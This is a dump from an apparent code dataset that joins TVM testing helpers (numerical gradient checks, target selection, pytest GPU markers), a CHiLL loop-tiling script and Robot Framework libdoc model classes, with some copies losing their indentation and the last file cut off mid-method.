    # The operands are equal iff their difference simplifies to integer zero.
    if not (isinstance(diff, tvm.tir.IntImm) and diff.value == 0):
        raise ValueError("{} and {} are not equal".format(lhs, rhs))
def check_bool_expr_is_true(bool_expr, vranges, cond=None):
    """Check that bool_expr holds given the condition cond
    for every value of free variables from vranges.

    For example, 2x > 4y solves to x > 2y given x in (0, 10) and y in (0, 10).
    Here bool_expr is x > 2y, vranges is {x: (0, 10), y: (0, 10)}, cond is 2x > 4y.

    We create iterations to check,
    for x in range(10):
      for y in range(10):
        assert !(2x > 4y) || (x > 2y)

    Parameters
    ----------
    bool_expr : tvm.ir.PrimExpr
        Boolean expression to check
    vranges: Dict[tvm.tir.expr.Var, tvm.ir.Range]
        Free variables and their ranges
    cond: tvm.ir.PrimExpr
        Extra condition that needs to be satisfied.

    Raises
    ------
    AssertionError
        If the expression is false for some assignment of the free variables;
        the message includes a concrete counterexample.
    """
    # When an extra condition is given, check the implication
    # cond => bool_expr, i.e. !cond || bool_expr.
    if cond is not None:
        bool_expr = tvm.te.any(tvm.tir.Not(cond), bool_expr)

    def _run_expr(expr, vranges):
        """Evaluate expr for every value of free variables
        given by vranges and return the tensor of results.
        """

        def _compute_body(*us):
            # Shift each iteration index by its range minimum so indices map
            # onto the actual variable values.
            vmap = {v: u + r.min for (v, r), u in zip(vranges.items(), us)}
            return tvm.tir.stmt_functor.substitute(expr, vmap)

        # Build and run a small TVM program that evaluates the expression over
        # the full cartesian product of the variable ranges.
        A = tvm.te.compute([r.extent.value for v, r in vranges.items()], _compute_body)
        args = [tvm.nd.empty(A.shape, A.dtype)]
        sch = tvm.te.create_schedule(A.op)
        mod = tvm.build(sch, [A])
        mod(*args)
        return args[0].numpy()

    res = _run_expr(bool_expr, vranges)
    if not np.all(res):
        # Take the first failing index and translate it back into variable
        # values so the error reports a concrete counterexample.
        indices = list(np.argwhere(res == 0)[0])
        counterex = [(str(v), i + r.min) for (v, r), i in zip(vranges.items(), indices)]
        counterex = sorted(counterex, key=lambda x: x[0])
        counterex = ", ".join([v + " = " + str(i) for v, i in counterex])
        ana = tvm.arith.Analyzer()
        raise AssertionError(
            "Expression {}\nis not true on {}\n"
            "Counterexample: {}".format(ana.simplify(bool_expr), vranges, counterex)
        )
def check_int_constraints_trans_consistency(constraints_trans, vranges=None):
    """Check IntConstraintsTransform is a bijective transformation.

    Parameters
    ----------
    constraints_trans : arith.IntConstraintsTransform
        Integer constraints transformation

    vranges: Dict[tvm.tir.Var, tvm.ir.Range]
        Free variables and their ranges
    """
    if vranges is None:
        vranges = {}

    # Verify one direction of the transformation: mapping each variable of
    # `constraints1` through `varmap` and back through `backvarmap` must be
    # the identity, and the relations of `constraints2` must hold whenever
    # the relations of `constraints1` hold.
    def _check_forward(constraints1, constraints2, varmap, backvarmap):
        ana = tvm.arith.Analyzer()
        all_vranges = vranges.copy()
        all_vranges.update({v: r for v, r in constraints1.ranges.items()})

        # Check that the transformation is injective
        cond_on_vars = tvm.tir.const(1, "bool")
        for v in constraints1.variables:
            if v in varmap:
                # variable mapping is consistent
                v_back = ana.simplify(tvm.tir.stmt_functor.substitute(varmap[v], backvarmap))
                cond_on_vars = tvm.te.all(cond_on_vars, v == v_back)
        # Also we have to check that the new relations are true when old relations are true
        cond_subst = tvm.tir.stmt_functor.substitute(
            tvm.te.all(tvm.tir.const(1, "bool"), *constraints2.relations), backvarmap
        )
        # We have to include relations from vranges too
        for v in constraints2.variables:
            if v in constraints2.ranges:
                r = constraints2.ranges[v]
                range_cond = tvm.te.all(v >= r.min, v < r.min + r.extent)
                range_cond = tvm.tir.stmt_functor.substitute(range_cond, backvarmap)
                cond_subst = tvm.te.all(cond_subst, range_cond)
        cond_subst = ana.simplify(cond_subst)
        # Exhaustively verify the combined condition under the source relations.
        check_bool_expr_is_true(
            tvm.te.all(cond_subst, cond_on_vars),
            all_vranges,
            cond=tvm.te.all(tvm.tir.const(1, "bool"), *constraints1.relations),
        )

    # Check both directions: src -> dst and dst -> src.
    _check_forward(
        constraints_trans.src,
        constraints_trans.dst,
        constraints_trans.src_to_dst,
        constraints_trans.dst_to_src,
    )
    _check_forward(
        constraints_trans.dst,
        constraints_trans.src,
        constraints_trans.dst_to_src,
        constraints_trans.src_to_dst,
    )
def _get_targets():
    """Return the set of target strings enabled for testing.

    Targets are read from the semicolon-separated ``TVM_TEST_TARGETS``
    environment variable, falling back to ``DEFAULT_TEST_TARGETS`` when it is
    unset or empty.  A target is kept only if this build of TVM enables its
    runtime and a corresponding device exists.  If nothing qualifies, a
    warning is logged and ``{"llvm"}`` is returned as a last resort.

    Returns
    -------
    Set[str]
        Enabled target strings (each may carry extra target attributes).
    """
    target_str = os.environ.get("TVM_TEST_TARGETS", "")
    if len(target_str) == 0:
        target_str = DEFAULT_TEST_TARGETS
    targets = set()
    for dev in target_str.split(";"):
        # Tolerate stray whitespace around separators (e.g. "llvm; cuda"):
        # previously a whitespace-only segment crashed on dev.split()[0], and
        # a padded entry was stored with its leading/trailing spaces.
        dev = dev.strip()
        if len(dev) == 0:
            continue
        # The first token is the target kind; any remaining tokens are flags.
        target_kind = dev.split()[0]
        if tvm.runtime.enabled(target_kind) and tvm.device(target_kind, 0).exist:
            targets.add(dev)
    if len(targets) == 0:
        logging.warning(
            "None of the following targets are supported by this build of TVM: %s."
            " Try setting TVM_TEST_TARGETS to a supported target. Defaulting to llvm.",
            target_str,
        )
        return {"llvm"}
    return targets
# Semicolon-separated fallback target list used by _get_targets() when the
# TVM_TEST_TARGETS environment variable is unset or empty.  Each entry is a
# full target string: the target kind plus optional attributes/flags.
DEFAULT_TEST_TARGETS = (
    "llvm;cuda;opencl;metal;rocm;vulkan;nvptx;"
    "llvm -device=arm_cpu;opencl -device=mali,aocl_sw_emu"
)
def device_enabled(target):
    """Check if a target should be used when testing.

    It is recommended that you use :py:func:`tvm.testing.parametrize_targets`
    instead of manually checking if a target is enabled.

    This allows the user to control which devices they are testing against. In
    tests, this should be used to check if a device should be used when said
    device is an optional part of the test.

    Parameters
    ----------
    target : str
        Target string to check against

    Returns
    -------
    bool
        Whether or not the device associated with this target is enabled.

    Example
    -------
    >>> @tvm.testing.uses_gpu
    >>> def test_mytest():
    >>>     for target in ["cuda", "llvm"]:
    >>>         if device_enabled(target):
    >>>             test_body...

    Here, `test_body` will only be reached by with `target="cuda"` on gpu test
    nodes and `target="llvm"` on cpu test nodes.
    """
    assert isinstance(target, str), "device_enabled requires a target as a string"
    # Only compare the target kind (the first token); enabled targets may
    # carry extra flags such as "llvm -device=arm_cpu".
    target_kind = target.split(" ")[0]
    # Generator expression avoids materializing a throwaway list for any().
    return any(target_kind in test_target for test_target in _get_targets())
def enabled_targets():
    """Return ``(target, device)`` pairs for every enabled target.

    Enabled means TVM was built with support for the target and the target
    appears in ``TVM_TEST_TARGETS`` (or ``DEFAULT_TEST_TARGETS`` when the
    variable is unset).  Tests using this must be decorated with
    :py:func:`tvm.testing.uses_gpu` to ever run on gpu nodes; in most cases
    prefer :py:func:`tvm.testing.parametrize_targets`.

    Returns
    -------
    targets: list
        A list of pairs of all enabled devices and the associated context.
    """
    return [(target, tvm.device(target)) for target in _get_targets()]
def _compose(args, decs):
"""Helper to apply multiple markers"""
if len(args) > 0:
f = args[0]
for d in reversed(decs):
f = d(f)
return f
return decs
def uses_gpu(*args):
    """Mark a test that uses the GPU in some capacity.

    Such tests still run on CPU-only nodes; use
    :py:func:`tvm.testing.requires_gpu` for tests that need a GPU present.
    """
    return _compose(args, [pytest.mark.gpu])
def requires_gpu(*args):
    """Mark a test as requiring a GPU; skipped when no GPU runtime device exists."""
    no_gpu_present = not any(
        device().exist
        for device in (tvm.cuda, tvm.rocm, tvm.opencl, tvm.metal, tvm.vulkan)
    )
    marks = [pytest.mark.skipif(no_gpu_present, reason="No GPU present")] + uses_gpu()
    return _compose(args, marks)
def requires_cuda(*args):
    """Mark a test as requiring the CUDA runtime (implies ``requires_gpu``)."""
    marks = [
        pytest.mark.cuda,
        pytest.mark.skipif(not device_enabled("cuda"), reason="CUDA support not enabled"),
    ] + requires_gpu()
    return _compose(args, marks)
def requires_cudagraph(*args):
    """Mark a test as requiring the CUDA Graph feature (implies ``requires_cuda``)."""
    marks = [
        pytest.mark.skipif(
            not nvcc.have_cudagraph(), reason="CUDA Graph is not supported in this environment"
        ),
    ] + requires_cuda()
    return _compose(args, marks)
def requires_opencl(*args):
    """Mark a test as requiring the OpenCL runtime (implies ``requires_gpu``)."""
    marks = [
        pytest.mark.opencl,
        pytest.mark.skipif(not device_enabled("opencl"), reason="OpenCL support not enabled"),
    ] + requires_gpu()
    return _compose(args, marks)
def requires_rocm(*args):
    """Mark a test as requiring the rocm runtime (implies ``requires_gpu``)."""
    marks = [
        pytest.mark.rocm,
        pytest.mark.skipif(not device_enabled("rocm"), reason="rocm support not enabled"),
    ] + requires_gpu()
    return _compose(args, marks)
def requires_metal(*args):
    """Mark a test as requiring the metal runtime (implies ``requires_gpu``)."""
    marks = [
        pytest.mark.metal,
        pytest.mark.skipif(not device_enabled("metal"), reason="metal support not enabled"),
    ] + requires_gpu()
    return _compose(args, marks)
def requires_vulkan(*args):
    """Mark a test as requiring the vulkan runtime (implies ``requires_gpu``)."""
    marks = [
        pytest.mark.vulkan,
        pytest.mark.skipif(not device_enabled("vulkan"), reason="vulkan support not enabled"),
    ] + requires_gpu()
    return _compose(args, marks)
def requires_tensorcore(*args):
    """Mark a test as requiring a tensorcore (implies ``requires_gpu``)."""
    marks = [
        pytest.mark.tensorcore,
        pytest.mark.skipif(
            not tvm.cuda().exist or not nvcc.have_tensorcore(tvm.cuda(0).compute_version),
            reason="No tensorcore present",
        ),
    ] + requires_gpu()
    return _compose(args, marks)
def requires_llvm(*args):
    """Mark a test as requiring the LLVM backend."""
    marks = [
        pytest.mark.llvm,
        pytest.mark.skipif(not device_enabled("llvm"), reason="LLVM support not enabled"),
    ]
    return _compose(args, marks)
def requires_micro(*args):
    """Mark a test as requiring microTVM (a build with ``USE_MICRO=ON``)."""
    marks = [
        pytest.mark.skipif(
            tvm.support.libinfo().get("USE_MICRO", "OFF") != "ON",
            reason="MicroTVM support not enabled. Set USE_MICRO=ON in config.cmake to enable.",
        )
    ]
    return _compose(args, marks)
def requires_rpc(*args):
    """Mark a test as requiring RPC (a build with ``USE_RPC=ON``)."""
    marks = [
        pytest.mark.skipif(
            tvm.support.libinfo().get("USE_RPC", "OFF") != "ON",
            reason="RPC support not enabled. Set USE_RPC=ON in config.cmake to enable.",
        )
    ]
    return _compose(args, marks)
def _target_to_requirement(target):
    """Map a target string to the list of pytest marks needed to run it."""
    # Checked in order; the first matching prefix wins.  Unknown targets get
    # no marks at all.
    dispatch = (
        ("cuda", requires_cuda),
        ("rocm", requires_rocm),
        ("vulkan", requires_vulkan),
        ("nvptx", lambda: [*requires_llvm(), *requires_gpu()]),
        ("metal", requires_metal),
        ("opencl", requires_opencl),
        ("llvm", requires_llvm),
    )
    for prefix, factory in dispatch:
        if target.startswith(prefix):
            return factory()
    return []
def parametrize_targets(*args):
    """Parametrize a test over enabled targets.

    May be used bare (``@tvm.testing.parametrize_targets``), in which case
    the test runs over everything from
    :py:func:`tvm.testing.enabled_targets`, or with explicit target strings
    (``@tvm.testing.parametrize_targets("llvm", "cuda")``).  The decorated
    test must accept ``(target, dev)`` parameters; each target is annotated
    with the pytest marks it requires.
    """

    def wrap(targets):
        def func(f):
            params = [
                pytest.param(t, tvm.device(t, 0), marks=_target_to_requirement(t))
                for t in targets
            ]
            return pytest.mark.parametrize("target,dev", params)(f)

        return func

    # Bare decorator usage: the single positional argument is the test itself.
    if len(args) == 1 and callable(args[0]):
        return wrap([t for t, _ in enabled_targets()])(args[0])
    return wrap(args)
def identity_after(x, sleep):
    """Return *x* unchanged, optionally sleeping first (testing helper).

    Parameters
    ----------
    x : object
        Value passed straight through.
    sleep : float or None
        Seconds to sleep before returning; falsy values skip the sleep.

    Returns
    -------
    x : object
        The original value.
    """
    if not sleep:
        return x
    time.sleep(sleep)
    return x
def terminate_self():
    """Terminate the current process with exit status -1 (testing helper)."""
    raise SystemExit(-1)
tvm._ffi._init_api("testing", __name__)
| 32.206452 | 97 | 0.626282 |
import logging
import os
import sys
import time
import pytest
import numpy as np
import tvm
import tvm.arith
import tvm.tir
import tvm.te
import tvm._ffi
from tvm.contrib import nvcc
def assert_allclose(actual, desired, rtol=1e-7, atol=1e-7):
    """Assert two array-likes agree in shape and (within *rtol*/*atol*) in value."""
    actual_arr = np.asanyarray(actual)
    desired_arr = np.asanyarray(desired)
    # Compare shapes first so a mismatch produces a clear error message.
    np.testing.assert_allclose(actual_arr.shape, desired_arr.shape)
    np.testing.assert_allclose(actual_arr, desired_arr, rtol=rtol, atol=atol, verbose=True)
def check_numerical_grads(
    function, input_values, grad_values, function_value=None, delta=1e-3, atol=1e-2, rtol=0.1
):
    """Numerically check the gradients of *function* against *grad_values*.

    Finite differences with step *delta* (one-sided, then central, then a
    higher-order combination when the cheaper estimate disagrees) are
    compared against the supplied analytical gradients.  Raises
    AssertionError when the aggregate distance exceeds
    ``atol*sqrt(n) + rtol*||ngrad||`` and ValueError on NaN/inf.

    ``input_values``/``grad_values`` may be dicts keyed by input name or
    plain sequences (converted to positional dicts below); *function_value*
    may be passed to avoid recomputing ``function(**input_values)``.
    """
    # Normalize the positional-sequence calling convention to the dict one.
    if not isinstance(input_values, dict):
        input_len = len(input_values)
        input_values = {str(idx): val for idx, val in enumerate(input_values)}
        def _function(_input_len=input_len, _orig_function=function, **kwargs):
            return _orig_function(*(kwargs[str(i)] for i in range(input_len)))
        function = _function
        grad_values = {str(idx): val for idx, val in enumerate(grad_values)}
    if function_value is None:
        function_value = function(**input_values)
    def modify(val, j, a_delta):
        # Copy of *val* with flat element j perturbed by a_delta.
        val = val.copy()
        val.reshape(-1)[j] = val.reshape(-1)[j] + a_delta
        return val
    def derivative(x_name, j, a_delta):
        # One-sided finite-difference derivative wrt flat element j of x_name.
        modified_values = {
            n: modify(val, j, a_delta) if n == x_name else val for n, val in input_values.items()
        }
        return (function(**modified_values) - function_value) / a_delta
    def compare_derivative(j, n_der, grad):
        der = grad.reshape(-1)[j]
        return np.abs(n_der - der) < atol + rtol * np.abs(n_der)
    for x_name, grad in grad_values.items():
        if grad.shape != input_values[x_name].shape:
            raise AssertionError(
                "Gradient wrt '{}' has unexpected shape {}, expected {} ".format(
                    x_name, grad.shape, input_values[x_name].shape
                )
            )
        ngrad = np.zeros_like(grad)
        wrong_positions = []
        for j in range(np.prod(grad.shape)):
            # Cheap one-sided estimate first; refine only when it disagrees.
            nder = derivative(x_name, j, delta)
            if not compare_derivative(j, nder, grad):
                # Central difference.
                nder = (derivative(x_name, j, -delta) + nder) / 2
                if not compare_derivative(j, nder, grad):
                    # Richardson-style combination of two central differences.
                    cnder2 = (
                        derivative(x_name, j, delta / 2) + derivative(x_name, j, -delta / 2)
                    ) / 2
                    nder = (4 * cnder2 - nder) / 3
            # list of wrong positions
            if not compare_derivative(j, nder, grad):
                wrong_positions.append(np.unravel_index(j, grad.shape))
            ngrad.reshape(-1)[j] = nder
        wrong_percentage = int(100 * len(wrong_positions) / np.prod(grad.shape))
        dist = np.sqrt(np.sum((ngrad - grad) ** 2))
        grad_norm = np.sqrt(np.sum(ngrad ** 2))
        if not (np.isfinite(dist) and np.isfinite(grad_norm)):
            raise ValueError(
                "NaN or infinity detected during numerical gradient checking wrt '{}'\n"
                "analytical grad = {}\n numerical grad = {}\n".format(x_name, grad, ngrad)
            )
        # we multiply atol by this number to make it more universal for different sizes
        sqrt_n = np.sqrt(float(np.prod(grad.shape)))
        if dist > atol * sqrt_n + rtol * grad_norm:
            raise AssertionError(
                "Analytical and numerical grads wrt '{}' differ too much\n"
                "analytical grad = {}\n numerical grad = {}\n"
                "{}% of elements differ, first 10 of wrong positions: {}\n"
                "distance > atol*sqrt(n) + rtol*grad_norm\n"
                "distance {} > {}*{} + {}*{}".format(
                    x_name,
                    grad,
                    ngrad,
                    wrong_percentage,
                    wrong_positions[:10],
                    dist,
                    atol,
                    sqrt_n,
                    rtol,
                    grad_norm,
                )
            )
        max_diff = np.max(np.abs(ngrad - grad))
        avg_diff = np.mean(np.abs(ngrad - grad))
        logging.info(
            "Numerical grad test wrt '%s' of shape %s passes, "
            "dist = %f, max_diff = %f, avg_diff = %f",
            x_name,
            grad.shape,
            dist,
            max_diff,
            avg_diff,
        )
def assert_prim_expr_equal(lhs, rhs):
    """Assert two TIR primitive expressions are equal (lhs - rhs simplifies to 0)."""
    analyzer = tvm.arith.Analyzer()
    diff = analyzer.simplify(lhs - rhs)
    if not (isinstance(diff, tvm.tir.IntImm) and diff.value == 0):
        raise ValueError("{} and {} are not equal".format(lhs, rhs))
def check_bool_expr_is_true(bool_expr, vranges, cond=None):
    """Check that *bool_expr* holds for every point of the variable grid.

    *vranges* maps TIR variables to their ranges; the expression is compiled
    and evaluated over the whole cartesian grid of values.  When *cond* is
    given the check becomes the implication ``cond => bool_expr``.  Raises
    AssertionError with a counterexample when the expression is false
    anywhere.
    """
    if cond is not None:
        # cond => bool_expr  ==  (not cond) or bool_expr
        bool_expr = tvm.te.any(tvm.tir.Not(cond), bool_expr)
    def _run_expr(expr, vranges):
        # Build and run a tensor whose elements evaluate *expr* at each grid point.
        def _compute_body(*us):
            vmap = {v: u + r.min for (v, r), u in zip(vranges.items(), us)}
            return tvm.tir.stmt_functor.substitute(expr, vmap)
        A = tvm.te.compute([r.extent.value for v, r in vranges.items()], _compute_body)
        args = [tvm.nd.empty(A.shape, A.dtype)]
        sch = tvm.te.create_schedule(A.op)
        mod = tvm.build(sch, [A])
        mod(*args)
        return args[0].numpy()
    res = _run_expr(bool_expr, vranges)
    if not np.all(res):
        # Report the first failing grid point as a named counterexample.
        indices = list(np.argwhere(res == 0)[0])
        counterex = [(str(v), i + r.min) for (v, r), i in zip(vranges.items(), indices)]
        counterex = sorted(counterex, key=lambda x: x[0])
        counterex = ", ".join([v + " = " + str(i) for v, i in counterex])
        ana = tvm.arith.Analyzer()
        raise AssertionError(
            "Expression {}\nis not true on {}\n"
            "Counterexample: {}".format(ana.simplify(bool_expr), vranges, counterex)
        )
def check_int_constraints_trans_consistency(constraints_trans, vranges=None):
    """Check that an integer-constraints transform is consistent both ways.

    Verifies both directions (src->dst and dst->src): the variable maps
    invert each other and the destination relations/ranges hold whenever the
    source constraints hold, for all values allowed by *vranges*.
    """
    if vranges is None:
        vranges = {}
    def _check_forward(constraints1, constraints2, varmap, backvarmap):
        ana = tvm.arith.Analyzer()
        all_vranges = vranges.copy()
        all_vranges.update({v: r for v, r in constraints1.ranges.items()})
        # Check that the transformation is injective
        cond_on_vars = tvm.tir.const(1, "bool")
        for v in constraints1.variables:
            if v in varmap:
                # variable mapping is consistent
                v_back = ana.simplify(tvm.tir.stmt_functor.substitute(varmap[v], backvarmap))
                cond_on_vars = tvm.te.all(cond_on_vars, v == v_back)
        # Also we have to check that the new relations are true when old relations are true
        cond_subst = tvm.tir.stmt_functor.substitute(
            tvm.te.all(tvm.tir.const(1, "bool"), *constraints2.relations), backvarmap
        )
        # We have to include relations from vranges too
        for v in constraints2.variables:
            if v in constraints2.ranges:
                r = constraints2.ranges[v]
                range_cond = tvm.te.all(v >= r.min, v < r.min + r.extent)
                range_cond = tvm.tir.stmt_functor.substitute(range_cond, backvarmap)
                cond_subst = tvm.te.all(cond_subst, range_cond)
        cond_subst = ana.simplify(cond_subst)
        check_bool_expr_is_true(
            tvm.te.all(cond_subst, cond_on_vars),
            all_vranges,
            cond=tvm.te.all(tvm.tir.const(1, "bool"), *constraints1.relations),
        )
    # Check src -> dst, then dst -> src with the maps swapped.
    _check_forward(
        constraints_trans.src,
        constraints_trans.dst,
        constraints_trans.src_to_dst,
        constraints_trans.dst_to_src,
    )
    _check_forward(
        constraints_trans.dst,
        constraints_trans.src,
        constraints_trans.dst_to_src,
        constraints_trans.src_to_dst,
    )
def _get_targets():
target_str = os.environ.get("TVM_TEST_TARGETS", "")
if len(target_str) == 0:
target_str = DEFAULT_TEST_TARGETS
targets = set()
for dev in target_str.split(";"):
if len(dev) == 0:
continue
target_kind = dev.split()[0]
if tvm.runtime.enabled(target_kind) and tvm.device(target_kind, 0).exist:
targets.add(dev)
if len(targets) == 0:
logging.warning(
"None of the following targets are supported by this build of TVM: %s."
" Try setting TVM_TEST_TARGETS to a supported target. Defaulting to llvm.",
target_str,
)
return {"llvm"}
return targets
DEFAULT_TEST_TARGETS = (
"llvm;cuda;opencl;metal;rocm;vulkan;nvptx;"
"llvm -device=arm_cpu;opencl -device=mali,aocl_sw_emu"
)
def device_enabled(target):
assert isinstance(target, str), "device_enabled requires a target as a string"
target_kind = target.split(" ")[
0
] # only check if device name is found, sometime there are extra flags
return any([target_kind in test_target for test_target in _get_targets()])
def enabled_targets():
return [(tgt, tvm.device(tgt)) for tgt in _get_targets()]
def _compose(args, decs):
if len(args) > 0:
f = args[0]
for d in reversed(decs):
f = d(f)
return f
return decs
def uses_gpu(*args):
_uses_gpu = [pytest.mark.gpu]
return _compose(args, _uses_gpu)
def requires_gpu(*args):
_requires_gpu = [
pytest.mark.skipif(
not tvm.cuda().exist
and not tvm.rocm().exist
and not tvm.opencl().exist
and not tvm.metal().exist
and not tvm.vulkan().exist,
reason="No GPU present",
),
*uses_gpu(),
]
return _compose(args, _requires_gpu)
def requires_cuda(*args):
_requires_cuda = [
pytest.mark.cuda,
pytest.mark.skipif(not device_enabled("cuda"), reason="CUDA support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_cuda)
def requires_cudagraph(*args):
_requires_cudagraph = [
pytest.mark.skipif(
not nvcc.have_cudagraph(), reason="CUDA Graph is not supported in this environment"
),
*requires_cuda(),
]
return _compose(args, _requires_cudagraph)
def requires_opencl(*args):
_requires_opencl = [
pytest.mark.opencl,
pytest.mark.skipif(not device_enabled("opencl"), reason="OpenCL support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_opencl)
def requires_rocm(*args):
_requires_rocm = [
pytest.mark.rocm,
pytest.mark.skipif(not device_enabled("rocm"), reason="rocm support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_rocm)
def requires_metal(*args):
_requires_metal = [
pytest.mark.metal,
pytest.mark.skipif(not device_enabled("metal"), reason="metal support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_metal)
def requires_vulkan(*args):
_requires_vulkan = [
pytest.mark.vulkan,
pytest.mark.skipif(not device_enabled("vulkan"), reason="vulkan support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_vulkan)
def requires_tensorcore(*args):
_requires_tensorcore = [
pytest.mark.tensorcore,
pytest.mark.skipif(
not tvm.cuda().exist or not nvcc.have_tensorcore(tvm.cuda(0).compute_version),
reason="No tensorcore present",
),
*requires_gpu(),
]
return _compose(args, _requires_tensorcore)
def requires_llvm(*args):
_requires_llvm = [
pytest.mark.llvm,
pytest.mark.skipif(not device_enabled("llvm"), reason="LLVM support not enabled"),
]
return _compose(args, _requires_llvm)
def requires_micro(*args):
_requires_micro = [
pytest.mark.skipif(
tvm.support.libinfo().get("USE_MICRO", "OFF") != "ON",
reason="MicroTVM support not enabled. Set USE_MICRO=ON in config.cmake to enable.",
)
]
return _compose(args, _requires_micro)
def requires_rpc(*args):
_requires_rpc = [
pytest.mark.skipif(
tvm.support.libinfo().get("USE_RPC", "OFF") != "ON",
reason="RPC support not enabled. Set USE_RPC=ON in config.cmake to enable.",
)
]
return _compose(args, _requires_rpc)
def _target_to_requirement(target):
# mapping from target to decorator
if target.startswith("cuda"):
return requires_cuda()
if target.startswith("rocm"):
return requires_rocm()
if target.startswith("vulkan"):
return requires_vulkan()
if target.startswith("nvptx"):
return [*requires_llvm(), *requires_gpu()]
if target.startswith("metal"):
return requires_metal()
if target.startswith("opencl"):
return requires_opencl()
if target.startswith("llvm"):
return requires_llvm()
return []
def parametrize_targets(*args):
def wrap(targets):
def func(f):
params = [
pytest.param(target, tvm.device(target, 0), marks=_target_to_requirement(target))
for target in targets
]
return pytest.mark.parametrize("target,dev", params)(f)
return func
if len(args) == 1 and callable(args[0]):
targets = [t for t, _ in enabled_targets()]
return wrap(targets)(args[0])
return wrap(args)
def identity_after(x, sleep):
if sleep:
time.sleep(sleep)
return x
def terminate_self():
sys.exit(-1)
tvm._ffi._init_api("testing", __name__)
| true | true |
1c3346bb5441b4ef67bd9069e53e3e12aee53d3a | 411 | py | Python | experiments/fdtd-2d/tmp_files/4665.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/fdtd-2d/tmp_files/4665.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/fdtd-2d/tmp_files/4665.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/4665.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,16,2)
tile(1,4,64,4)
tile(2,2,16,2)
tile(2,4,64,4)
tile(3,2,16,2)
tile(3,4,64,4)
| 22.833333 | 116 | 0.720195 | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/4665.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,16,2)
tile(1,4,64,4)
tile(2,2,16,2)
tile(2,4,64,4)
tile(3,2,16,2)
tile(3,4,64,4)
| true | true |
1c3347874c5ab5358cfcfa85a11e8a42aa32e186 | 1,991 | py | Python | src/robot/libdocpkg/model.py | ldtri0209/robotframework | 6bc11a350cbaf5d0801cc5431f32cc1435bb65df | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2016-01-13T13:48:28.000Z | 2021-09-05T07:14:07.000Z | src/robot/libdocpkg/model.py | ldtri0209/robotframework | 6bc11a350cbaf5d0801cc5431f32cc1435bb65df | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robot/libdocpkg/model.py | ldtri0209/robotframework | 6bc11a350cbaf5d0801cc5431f32cc1435bb65df | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2018-01-18T22:00:17.000Z | 2018-07-26T10:53:00.000Z | # Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
from robot.utils import setter
from .writer import LibdocWriter
from .output import LibdocOutput
class LibraryDoc(object):
    """Documentation model for a whole test library or resource file.

    NOTE(review): the @setter decorator comes from robot.utils —
    presumably it stores the value returned by the decorated method as the
    attribute; confirm against robot.utils before relying on details.
    """

    def __init__(self, name='', doc='', version='', type='library',
                 scope='', named_args=True, doc_format=''):
        self.name = name
        self.doc = doc
        self.version = version
        self.type = type
        self.scope = scope
        self.named_args = named_args
        self.doc_format = doc_format
        self.inits = []      # KeywordDoc objects for library constructors
        self.keywords = []   # KeywordDoc objects, kept sorted (see setter)

    @setter
    def scope(self, scope):
        # Normalize internal scope constants to the user-facing spelling.
        return {'TESTCASE': 'test case',
                'TESTSUITE': 'test suite',
                'GLOBAL': 'global'}.get(scope, scope)

    @setter
    def doc_format(self, format):
        # An empty/None format falls back to Robot's own documentation syntax.
        return format or 'ROBOT'

    @setter
    def keywords(self, kws):
        # Keywords are stored sorted; KeywordDoc defines ordering by name.
        return sorted(kws)

    def save(self, output=None, format='HTML'):
        """Write this library documentation to *output* in the given *format*."""
        with LibdocOutput(output, format) as outfile:
            LibdocWriter(format).write(self, outfile)
class KeywordDoc(object):
    """Documentation model for a single keyword: name, arguments and doc text."""

    def __init__(self, name='', args=None, doc=''):
        self.name = name
        self.args = args or []
        self.doc = doc

    @property
    def shortdoc(self):
        """First line of the keyword documentation, or '' when undocumented."""
        return self.doc.splitlines()[0] if self.doc else ''

    def __cmp__(self, other):
        # Python 2 ordering hook; Python 3 ignores __cmp__ entirely.
        return cmp(self.name.lower(), other.name.lower())

    def __lt__(self, other):
        # Case-insensitive ordering by name.  Required for sorted() on
        # Python 3 (fixes TypeError in LibraryDoc's keywords setter), while
        # __cmp__ above keeps Python 2 behavior unchanged.
        return self.name.lower() < other.name.lower()
| 28.855072 | 75 | 0.641888 |
from __future__ import with_statement
from robot.utils import setter
from .writer import LibdocWriter
from .output import LibdocOutput
class LibraryDoc(object):
def __init__(self, name='', doc='', version='', type='library',
scope='', named_args=True, doc_format=''):
self.name = name
self.doc = doc
self.version = version
self.type = type
self.scope = scope
self.named_args = named_args
self.doc_format = doc_format
self.inits = []
self.keywords = []
@setter
def scope(self, scope):
return {'TESTCASE': 'test case',
'TESTSUITE': 'test suite',
'GLOBAL': 'global'}.get(scope, scope)
@setter
def doc_format(self, format):
return format or 'ROBOT'
@setter
def keywords(self, kws):
return sorted(kws)
def save(self, output=None, format='HTML'):
